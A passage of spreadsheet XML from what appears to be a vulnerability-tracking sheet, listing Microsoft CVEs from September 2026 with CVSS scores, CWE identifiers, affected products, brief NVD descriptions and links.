      </c>
      <c r="C135" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69285</t>
        </is>
      </c>
      <c r="D135" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E135" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F135" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G135" s="5" t="inlineStr"/>
      <c r="H135" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I135" s="5" t="inlineStr"/>
      <c r="J135" s="5" t="inlineStr"/>
      <c r="K135" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L135" s="5" t="inlineStr"/>
      <c r="M135" s="5" t="inlineStr"/>
      <c r="N135" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O135" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P135" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q135" s="5" t="inlineStr"/>
      <c r="R135" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S135" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T135" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69285</t>
        </is>
      </c>
    </row>
    <row r="136">
      <c r="A136" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B136" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C136" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69291</t>
        </is>
      </c>
      <c r="D136" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E136" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F136" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G136" s="5" t="inlineStr"/>
      <c r="H136" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I136" s="5" t="inlineStr"/>
      <c r="J136" s="5" t="inlineStr"/>
      <c r="K136" s="5" t="inlineStr"/>
      <c r="L136" s="5" t="inlineStr"/>
      <c r="M136" s="5" t="inlineStr"/>
      <c r="N136" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O136" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P136" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q136" s="5" t="inlineStr"/>
      <c r="R136" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S136" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T136" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69291</t>
        </is>
      </c>
    </row>
    <row r="137">
      <c r="A137" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B137" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C137" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69334</t>
        </is>
      </c>
      <c r="D137" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E137" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F137" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G137" s="5" t="inlineStr"/>
      <c r="H137" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I137" s="5" t="inlineStr"/>
      <c r="J137" s="5" t="inlineStr"/>
      <c r="K137" s="5" t="inlineStr"/>
      <c r="L137" s="5" t="inlineStr"/>
      <c r="M137" s="5" t="inlineStr"/>
      <c r="N137" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O137" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P137" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q137" s="5" t="inlineStr"/>
      <c r="R137" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="S137" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T137" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69334</t>
        </is>
      </c>
    </row>
    <row r="138">
      <c r="A138" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B138" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C138" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69355</t>
        </is>
      </c>
      <c r="D138" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E138" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F138" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G138" s="5" t="inlineStr"/>
      <c r="H138" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I138" s="5" t="inlineStr"/>
      <c r="J138" s="5" t="inlineStr"/>
      <c r="K138" s="5" t="inlineStr"/>
      <c r="L138" s="5" t="inlineStr"/>
      <c r="M138" s="5" t="inlineStr"/>
      <c r="N138" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O138" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P138" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q138" s="5" t="inlineStr"/>
      <c r="R138" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="S138" s="5" t="inlineStr">
        <is>
          <t>External control of file name or path in Microsoft Exchange Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T138" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69355</t>
        </is>
      </c>
    </row>
    <row r="139">
      <c r="A139" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B139" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C139" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69360</t>
        </is>
      </c>
      <c r="D139" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E139" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F139" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G139" s="5" t="inlineStr"/>
      <c r="H139" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I139" s="5" t="inlineStr"/>
      <c r="J139" s="5" t="inlineStr"/>
      <c r="K139" s="5" t="inlineStr"/>
      <c r="L139" s="5" t="inlineStr"/>
      <c r="M139" s="5" t="inlineStr"/>
      <c r="N139" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O139" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P139" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q139" s="5" t="inlineStr"/>
      <c r="R139" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S139" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T139" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69360</t>
        </is>
      </c>
    </row>
    <row r="140">
      <c r="A140" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B140" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C140" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69386</t>
        </is>
      </c>
      <c r="D140" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E140" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F140" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G140" s="5" t="inlineStr"/>
      <c r="H140" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I140" s="5" t="inlineStr"/>
      <c r="J140" s="5" t="inlineStr"/>
      <c r="K140" s="5" t="inlineStr"/>
      <c r="L140" s="5" t="inlineStr"/>
      <c r="M140" s="5" t="inlineStr"/>
      <c r="N140" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O140" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P140" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q140" s="5" t="inlineStr"/>
      <c r="R140" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S140" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T140" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69386</t>
        </is>
      </c>
    </row>
    <row r="141">
      <c r="A141" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B141" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C141" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69434</t>
        </is>
      </c>
      <c r="D141" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E141" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F141" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G141" s="5" t="inlineStr"/>
      <c r="H141" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I141" s="5" t="inlineStr"/>
      <c r="J141" s="5" t="inlineStr"/>
      <c r="K141" s="5" t="inlineStr"/>
      <c r="L141" s="5" t="inlineStr"/>
      <c r="M141" s="5" t="inlineStr"/>
      <c r="N141" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O141" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P141" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q141" s="5" t="inlineStr"/>
      <c r="R141" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S141" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows URL Moniker allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T141" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69434</t>
        </is>
      </c>
    </row>
    <row r="142">
      <c r="A142" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B142" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C142" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69439</t>
        </is>
      </c>
      <c r="D142" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E142" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F142" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G142" s="5" t="inlineStr"/>
      <c r="H142" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I142" s="5" t="inlineStr"/>
      <c r="J142" s="5" t="inlineStr"/>
      <c r="K142" s="5" t="inlineStr"/>
      <c r="L142" s="5" t="inlineStr"/>
      <c r="M142" s="5" t="inlineStr"/>
      <c r="N142" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O142" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P142" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q142" s="5" t="inlineStr"/>
      <c r="R142" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S142" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T142" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69439</t>
        </is>
      </c>
    </row>
    <row r="143">
      <c r="A143" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B143" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C143" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69442</t>
        </is>
      </c>
      <c r="D143" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E143" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F143" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G143" s="5" t="inlineStr"/>
      <c r="H143" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I143" s="5" t="inlineStr"/>
      <c r="J143" s="5" t="inlineStr"/>
      <c r="K143" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L143" s="5" t="inlineStr"/>
      <c r="M143" s="5" t="inlineStr"/>
      <c r="N143" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O143" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P143" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q143" s="5" t="inlineStr"/>
      <c r="R143" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S143" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T143" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69442</t>
        </is>
      </c>
    </row>
    <row r="144">
      <c r="A144" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B144" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C144" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69461</t>
        </is>
      </c>
      <c r="D144" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E144" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F144" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G144" s="5" t="inlineStr"/>
      <c r="H144" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I144" s="5" t="inlineStr"/>
      <c r="J144" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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4" s="5" t="inlineStr"/>
      <c r="M144" s="5" t="inlineStr"/>
      <c r="N144" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O144" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P144" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q144" s="5" t="inlineStr"/>
      <c r="R144" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S144" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows NTFS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T144" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69461</t>
        </is>
      </c>
    </row>
    <row r="145">
      <c r="A145" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B145" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C145" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69464</t>
        </is>
      </c>
      <c r="D145" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E145" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F145" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G145" s="5" t="inlineStr"/>
      <c r="H145" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I145" s="5" t="inlineStr"/>
      <c r="J145" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K145" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L145" s="5" t="inlineStr"/>
      <c r="M145" s="5" t="inlineStr"/>
      <c r="N145" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O145" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P145" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q145" s="5" t="inlineStr"/>
      <c r="R145" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="S145" s="5" t="inlineStr">
        <is>
          <t>Execution with unnecessary privileges in Microsoft Office SharePoint allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T145" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69464</t>
        </is>
      </c>
    </row>
    <row r="146">
      <c r="A146" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B146" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C146" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69465</t>
        </is>
      </c>
      <c r="D146" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E146" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F146" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G146" s="5" t="inlineStr"/>
      <c r="H146" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I146" s="5" t="inlineStr"/>
      <c r="J146" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K146" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L146" s="5" t="inlineStr"/>
      <c r="M146" s="5" t="inlineStr"/>
      <c r="N146" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O146" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P146" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q146" s="5" t="inlineStr"/>
      <c r="R146" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S146" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T146" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69465</t>
        </is>
      </c>
    </row>
    <row r="147">
      <c r="A147" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B147" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C147" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69485</t>
        </is>
      </c>
      <c r="D147" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E147" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F147" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G147" s="5" t="inlineStr"/>
      <c r="H147" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I147" s="5" t="inlineStr"/>
      <c r="J147" s="5" t="inlineStr"/>
      <c r="K147" s="5" t="inlineStr"/>
      <c r="L147" s="5" t="inlineStr"/>
      <c r="M147" s="5" t="inlineStr"/>
      <c r="N147" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O147" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P147" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q147" s="5" t="inlineStr"/>
      <c r="R147" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="S147" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Remote Desktop Client allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T147" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69485</t>
        </is>
      </c>
    </row>
    <row r="148">
      <c r="A148" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B148" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C148" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69494</t>
        </is>
      </c>
      <c r="D148" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E148" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F148" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G148" s="5" t="inlineStr"/>
      <c r="H148" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I148" s="5" t="inlineStr"/>
      <c r="J148" s="5" t="inlineStr"/>
      <c r="K148" s="5" t="inlineStr"/>
      <c r="L148" s="5" t="inlineStr"/>
      <c r="M148" s="5" t="inlineStr"/>
      <c r="N148" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O148" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P148" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q148" s="5" t="inlineStr"/>
      <c r="R148" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="S148" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Event Logging Service allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T148" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69494</t>
        </is>
      </c>
    </row>
    <row r="149">
      <c r="A149" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B149" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C149" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69495</t>
        </is>
      </c>
      <c r="D149" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E149" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F149" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G149" s="5" t="inlineStr"/>
      <c r="H149" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I149" s="5" t="inlineStr"/>
      <c r="J149" s="5" t="inlineStr"/>
      <c r="K149" s="5" t="inlineStr"/>
      <c r="L149" s="5" t="inlineStr"/>
      <c r="M149" s="5" t="inlineStr"/>
      <c r="N149" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O149" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P149" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q149" s="5" t="inlineStr"/>
      <c r="R149" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S149" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Event Logging Service allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T149" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69495</t>
        </is>
      </c>
    </row>
    <row r="150">
      <c r="A150" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B150" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C150" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69499</t>
        </is>
      </c>
      <c r="D150" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E150" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F150" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G150" s="5" t="inlineStr"/>
      <c r="H150" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I150" s="5" t="inlineStr"/>
      <c r="J150" s="5" t="inlineStr"/>
      <c r="K150" s="5" t="inlineStr"/>
      <c r="L150" s="5" t="inlineStr"/>
      <c r="M150" s="5" t="inlineStr"/>
      <c r="N150" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O150" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P150" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q150" s="5" t="inlineStr"/>
      <c r="R150" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S150" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T150" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69499</t>
        </is>
      </c>
    </row>
    <row r="151">
      <c r="A151" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B151" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C151" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69511</t>
        </is>
      </c>
      <c r="D151" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E151" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F151" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G151" s="5" t="inlineStr"/>
      <c r="H151" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I151" s="5" t="inlineStr"/>
      <c r="J151" s="5" t="inlineStr"/>
      <c r="K151" s="5" t="inlineStr"/>
      <c r="L151" s="5" t="inlineStr"/>
      <c r="M151" s="5" t="inlineStr"/>
      <c r="N151" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O151" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P151" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q151" s="5" t="inlineStr"/>
      <c r="R151" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S151" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T151" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69511</t>
        </is>
      </c>
    </row>
    <row r="152">
      <c r="A152" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B152" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C152" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69518</t>
        </is>
      </c>
      <c r="D152" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E152" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F152" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G152" s="5" t="inlineStr"/>
      <c r="H152" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I152" s="5" t="inlineStr"/>
      <c r="J152" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
